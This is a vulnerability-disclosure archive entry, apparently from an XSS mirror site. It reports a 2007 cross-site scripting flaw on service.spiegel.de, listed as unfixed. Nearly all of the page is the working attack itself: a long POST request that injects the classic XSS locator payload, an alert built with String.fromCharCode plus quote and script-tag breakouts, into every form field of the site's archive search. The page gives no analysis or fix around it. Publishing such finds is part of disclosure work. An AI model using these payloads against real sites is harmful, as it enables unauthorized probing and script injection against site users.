Security researcher Venom23, has submitted on 11/09/2007 a cross-site-scripting (XSS) vulnerability affecting service.spiegel.de, which at the time of submission ranked 258 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 11/09/2007 |
Date published: 13/09/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: Venom23 |
Domain: service.spiegel.de |
Category: XSS |
Pagerank: 258 |
URL: http://service.spiegel.de/digas/archiv |
POST: REQ_TYPE=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(St ring.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert (String.fromCharCode(88,83,83))</SCRIPT>=&{}&key__cl__digas=';alert(String.fromCharCode(88,83,83))// \';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fro mCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}&SD=' ;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromC harCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fr omCharCode(88,83,83))</SCRIPT>=&{}&F=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCha rCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//- -></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}&NEVER_BROWSE=';alert(String .fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83 ,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88 ,83,83))</SCRIPT>=&{}&QID=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83 ,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT> ">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}&OBJECT_ALL=';alert(String.fromCharCode (88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";ale rt(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCR IPT>=&{}&S=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert( String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>ale rt(String.fromCharCode(88,83,83))</SCRIPT>=&{}&TEMPLATE=';alert(String.fromCharCode(88,83,83))//\';a lert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCha rCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}&T=';aler t(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCo de(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCha rCode(88,83,83))</SCRIPT>=&{}&SBEAN_KEY=';alert(String.fromCharCode(88,83,83))//\';alert(String.from CharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83)) //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}&ROLLO_S_TERM_LOGIC_1=';a lert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCha rCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.from CharCode(88,83,83))</SCRIPT>=&{}&ROLLO_ATTR_LIST_1=';alert(String.fromCharCode(88,83,83))//\';alert( String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode (88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}&S_TERM_1=';al ert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromChar Code(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromC harCode(88,83,83))</SCRIPT>=&{}&append_docs__wcl__digas=';alert(String.fromCharCode(88,83,83))//\';a lert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCha rCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}&add_webd ossier__wcl__digas=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))// ";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SC RIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}&searchTerm=';alert(String.fromCharCode(88,83, 83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(Stri ng.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{ }&ATTRLIST=kopftextautor&QUELLE=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></S CRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}&QUELLE=';alert(String.fromCharCo de(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";a lert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</S CRIPT>=&{}&QUELLE=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//" ;alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCR IPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}&QUELLE=';alert(String.fromCharCode(88,83,83))/ /\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fr omCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}&QUE LLE=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String. fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(Stri ng.fromCharCode(88,83,83))</SCRIPT>=&{}&QUELLE=';alert(String.fromCharCode(88,83,83))//\';alert(Stri ng.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88, 83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}&QUELLE=';alert(St ring.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(8 8,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCod e(88,83,83))</SCRIPT>=&{}&DATE_VOR=-1J&FROM_DATE_DISPLAY=';alert(String.fromCharCode(88,83,83))//\'; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCh arCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}&TO_DATE _DISPLAY=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(St ring.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert (String.fromCharCode(88,83,83))</SCRIPT>=&{} |
Click here to view the mirror
|
|